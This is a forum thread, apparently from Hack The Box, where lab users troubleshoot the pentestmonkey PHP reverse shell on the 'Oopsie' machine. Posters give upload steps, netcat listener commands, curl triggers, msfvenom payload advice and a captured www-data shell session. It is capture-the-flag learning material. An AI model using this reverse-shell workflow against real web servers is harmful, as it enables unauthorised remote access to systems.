php-reverse-shell.php issue

@ivanitlearning said:
Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

No luck there either. Every exploit I tried, nothing happened and then when I exited it would say “exploit successful. No session created”

Hello Everyone,

I got the same problems. I tried to go through everything and I made it in the end :smiley:, so this will help you troubleshoot the issue and try everything:

  1. Before uploading php-reverse-shell.php to the target, first of all modify the IP address and put the one that was assigned to you through your connection to the Hackthebox network. It starts with 10.10.14. and you can find it using either the “ifconfig” or the “ip a” command. About the port number, you can change the port or leave it as it is, i.e. “1234”, but for best practice let’s change it to “33456” instead.

  2. Now that you have modified the file, you uploaded it to the web server and you got that message on the web browser that your file is uploaded. CONGRATS!! Here’s the critical part:

  3. First of all run the nc command “nc -lvnp 33456”, and before running it check that the firewall is disabled using the command “ufw status”.

  4. Now you’re listening on port 33456 and you’re waiting for the machine to reverse connect to you; you invoke the event by running the curl command (make sure that your filename is right).

  5. Normally in this case you should see, on the terminal where you executed the “nc” command, that you get a little $ to run your commands and that the connection is established.

There’s something I still don’t understand: if I stay inactive in the connection I established, the connection on the port closes (which is normal), but when I try to execute the curl command I get a 404 which specifies that the file is removed, so I need to go through the process again and upload the file and… I think that when the php script is terminated it deletes itself automatically, which is a good cybersecurity best practice to not leave a print in the attacked machine.

Best Regards,
Salah,

Check whether you are entering the correct IP address; it must be the tun0 interface. And try listening via nc -lvvp 1234.

2 Likes

@SalahEo said:
There’s something I still don’t understand: if I stay inactive in the connection I established, the connection on the port closes (which is normal), but when I try to execute the curl command I get a 404 which specifies that the file is removed, so I need to go through the process again and upload the file and… I think that when the php script is terminated it deletes itself automatically, which is a good cybersecurity best practice to not leave a print in the attacked machine.

Tip for your next machines: when uploading files that keep getting deleted, if you’re using Burp Proxy you can send the upload request from Proxy > HTTP history to Repeater and resend it to upload the same file again without modifying any cookies or data.

1 Like

Sorry, I never explained the mistake I was making. It is embarrassing, but it may help someone. Keep in mind I was a total noob, I mean my noobness was extreme, not as bad now… But to the problem I was making for myself… How are you getting your shell to your box? Are you serving it? Like, does that server speak php? If so you are only going to upload error messages, not a shell. So turn apache2 off on your haxor box, and use

python3 -m http.server port
sudo python3 -m http.server low port

I hope this helps someone, it was my first real big problem and was very discouraging.
I apologize for stealing that moment when you figured out your problem if that is indeed what just happened.

Just in case anyone else is facing the same problem, point the reverse shell to your HTB IP address located at the tun0 interface and not your WIFI interface.

1 Like

Heya, I am facing the same issue.
- My tun0 interface IP is 10.10.14.23
- No firewall is up at machine or network level
- No port redirection for 8443
- My VPN is up and running (I can ping and access the oopsie machine)
- I have successfully uploaded a reverseshell.php and set the IP 10.10.14.23 and port 8443
- I am listening on port 8443
nc -lvnp 8443
listening on [any] 8443 …

- And when I execute the shell I get
[~/HTB/Oopsie]
└─$ curl http://10.10.10.28/uploads/reverseshelltest.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Connection refused (111)

I am really trying to see what is causing this, no more hints so far :frowning:

PS: btw, for those who get a 404 error, the files are deleted every X minutes, so you should upload it again.

Hello,

You probably use a server that has a php module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete the extension of the php file, then transfer it to the victim machine and add the .php extension after. Normally it should work.

Just a quick follow up: this was due to the duration of the VPN tunnel somehow; it had been running all night. I closed it, regenerated the access pack and got the same workflow running at the same time. Not sure exactly what (a time out? a token? …) but at least I was able to complete it!

@Vetka said:

Hello,

You probably use a server that has a php module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete the extension of the php file, then transfer it to the victim machine and add the .php extension after. Normally it should work.

How would you do that? I have the same problem.

Did you check whether the local firewall is running? I stopped it and found the webshell.

So, I had this in my ifconfig command:

<snip>

tun1: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet <ip>  netmask 255.255.254.0  destination <desip>
        inet6 dead:<ip6>  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::<ipv6>  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 100 
</snip>

and I used the IP given in inet as the IP to be provided in the script with port 1234 and I got the reverse shell… I think it’s the IP tunnel that is being shown as my external IP or something to hide the internal IP.

In my case there are two, “tun0” and “tun1”. Put one of the IPs in the php-reverse-shell.php file;
this worked for me.

┌──(krish500㉿DESKTOP-18BPFD5)-[/usr/share/webshells]
└─$ sudo nc -lnvp 8443
[sudo] password for krish500:
listening on [any] 8443 …
connect to [10.10.14.179] from (UNKNOWN) [10.129.112.164] 58646
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:24:20 up 1:56, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ ls
bin
boot
cdrom
dev
etc
home
initrd.img
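Since several posts above trace the failure to the wrong interface address (WiFi instead of tun0, or tun0 vs tun1), here is an added pre-flight check, not code from any poster, that parses the output of `ip -o -4 addr show` and `ip route` and returns the interface and address that actually carry the route to the lab host. The sample outputs below are constructed; the function names are my own.

```python
import re
import subprocess
import ipaddress

# Constructed sample of `ip -o -4 addr show` (not a real host).
SAMPLE_ADDR = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: wlan0    inet 192.168.1.42/24 brd 192.168.1.255 scope global dynamic wlan0\\       valid_lft 86000sec preferred_lft 86000sec
3: tun0    inet 10.10.14.23/23 scope global tun0\\       valid_lft forever preferred_lft forever
4: tun1    inet 10.8.0.6/24 scope global tun1\\       valid_lft forever preferred_lft forever
"""

# Constructed sample of `ip route` for the same host.
SAMPLE_ROUTE = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
10.8.0.0/24 dev tun1 proto kernel scope link src 10.8.0.6
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.23
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.42 metric 600
"""

def parse_addrs(text):
    """Map interface name -> IPv4 address from `ip -o -4 addr show` output."""
    addrs = {}
    for line in text.splitlines():
        m = re.match(r"\d+:\s+(\S+)\s+inet\s+(\d+\.\d+\.\d+\.\d+)/\d+", line)
        if m:
            addrs[m.group(1)] = m.group(2)
    return addrs

def route_dev(text, target):
    """Interface used by the most specific route covering `target` (longest prefix wins)."""
    target = ipaddress.ip_address(target)
    best = None
    for line in text.splitlines():
        parts = line.split()
        if "dev" not in parts:
            continue
        dst = "0.0.0.0/0" if parts[0] == "default" else parts[0]
        net = ipaddress.ip_network(dst, strict=False)
        if target in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, parts[parts.index("dev") + 1])
    return best[1] if best else None

def listener_ip(addr_text, route_text, target):
    """(dev, ip) the target can reach back: the address on the interface that routes to it."""
    dev = route_dev(route_text, target)
    addrs = parse_addrs(addr_text)
    return (dev, addrs[dev]) if dev in addrs else None

if __name__ == "__main__":
    live_addr = subprocess.check_output(["ip", "-o", "-4", "addr", "show"], text=True)
    live_route = subprocess.check_output(["ip", "route"], text=True)
    print(listener_ip(live_addr, live_route, "10.10.10.28"))
```

Run as a script it reads the live tables and prints the interface and IP to put in the listener and in the script; `None` means there is no route to the target, so the VPN is the problem rather than the shell.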

Hi guys.
I want to help you solve the problem with the Kali machine.
I myself have encountered this problem many times, but every time the task arose to attack a virtual server from my Kali machine, I always put off the decision for later, because I could not decide quickly.
If you are using the pwnbox virtual machine, then things are much simpler. You simply specify the IP not of the network interface, but of the VPN connection, as has been written here many times.
But what if you are using your local Kali machine?
First, I would like you to think about how your Kali machine knows the route through the VPN tunnel.
It doesn’t. You need a route from your Kali machine to the attacked pwnbox server through a VPN tunnel.
The easiest way is to set up OpenVPN on your Kali machine.
This can be done very quickly with the commands
sudo apt-get update
sudo apt-get install openvpn network-manager
After that, you download the configuration file and create a new VPN interface in the settings of the Kali machine, where you import the configuration file without specifying a login and password!
That’s it: now you start the new VPN and everything should work.
When setting up the shell, you specify the VPN connection IP!!! instead of the IP of your network interface!!!
Be sure to check that you have 2 interfaces enabled: 1 - your network interface for Internet access, and 1 - the new VPN interface for connecting to the pwnbox network.
Good luck.
Create a VPN connection
Sorry for the screenshots in this resolution, did it quickly.

1 Like

We check that 2 interfaces were included!!!

That is because the docker machine is using a public IP, and if you use your private IP like 10.10.15… it is not going to work.

We have to reverse the shell to a public IP and do port forwarding, or use a service like ngrok.

I tried to use ngrok btw but it didn’t work.

On HTB Academy, for example, the exercise is using a public IP; it depends on your case.

That works because your target machine is on the same VLAN as your attack machine.

Well, it took me a couple of hours to figure out a solution for that issue; hope it will help anyone.
So I just started doing stuff with htb lately, but I had done reverse shells before with nc and never had problems till now. VPN, network, IPs, ports, everything was ok, but yet it’s not working.
Wandering the space of the internet led me to some topics and advice but none seemed to help. I knew that my journey with htb would be worthless without having the ability to use a reverse shell; I almost gave up after spending all night on this, but the next day…

SOLUTION > It seems that for some of the well known php shells you can grab from github (and there aren’t many, to my surprise) won’t do the trick and won’t work, so I went and used msfvenom to generate a shell payload (PHP Reverse Shell with Metasploit). For php@htb you will have to use php/reverse_php (PHP Command Shell, Reverse TCP (via PHP) - Metasploit - InfosecMatter) for the simplicity and for the final size. Once you have this shell running and connected to the victim from msfconsole, run the nc command to make a connection from the shell back to your nc listener (listen on your end before, and use a random port of at least 5 chars, ex. 55433) and you shall have a new connection on nc now. Happy hacking.

It worked for me broo…
Thanks…!!

Check the payload mentioned in the php reverse shell script; it is possible that the payload in the script is for another OS than the one you’re targeting on the box.